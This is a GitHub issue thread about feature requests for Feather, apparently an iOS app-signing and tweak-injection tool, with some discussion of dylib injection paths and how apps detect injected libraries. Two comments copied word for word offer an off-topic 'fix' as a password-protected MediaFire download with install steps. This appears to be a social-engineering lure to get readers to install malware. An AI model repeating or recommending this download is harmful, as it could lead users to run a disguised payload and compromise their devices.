### ISSUE TITLE
[Request] Can I requests?

### ISSUE THREAD

**Issue by brynts** [khcrysalis/Feather#47]
1. Add file browser
2. Add ability to uncompress zip, deb, etc in file browser
3. Add ability to change tweak injection path to @ executable or @ rpath & injection path folder to "/" or "Frameworks/"
4. Add ability to choose CydiaSubstrate or libsubstrate
5. Add ability to save Properties option (so I'm not change the Properties options every injecting an app)
6. Add active download indicator on global window

**Comment by khcrysalis** [comment]
3 and 5 are planned and will be added in future releases. For the rest, I feel its unneeded for this app.

Im not adding a file browser, not adding a download manager, and im not adding a way to switch from Ellekit. I'd rather try to adopt to new standards set by the people who maintain theos and ellekit for this community, and also in reality, it makes no difference to the user.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by asdfzxcvbn** [comment]
in reality even 3 is useless, i really don't see a need for it, just change the dependency paths of dylibs that rely on each other

the only reason it'd be helpful is if something is hardcoded but that's pretty garbage and the dev should fix it, always inject into `@rpath`/`@executable_path/Frameworks`

**Comment by khcrysalis** [comment]
I only considered it due to people mentioning some sort of detection, but I have no real confidence this is actually the case.

**Comment by asdfzxcvbn** [comment]
> I only considered it due to people mentioning some sort of detection, but I have no real confidence this is actually the case.

what type of detection? any app i've ever seen will check if 3rd party dylibs are being loaded rather than checking if a file exists in the bundle

**Comment by khcrysalis** [comment]
Apparently its just checking the contents of their bundle, well at least thats what ive heard from another person here. /shrug

**Comment by khcrysalis** [comment]
I've added universal properties section in settings to change settings globally on main branch (will be available next release), as for the rest of the features, unlikely to be added.
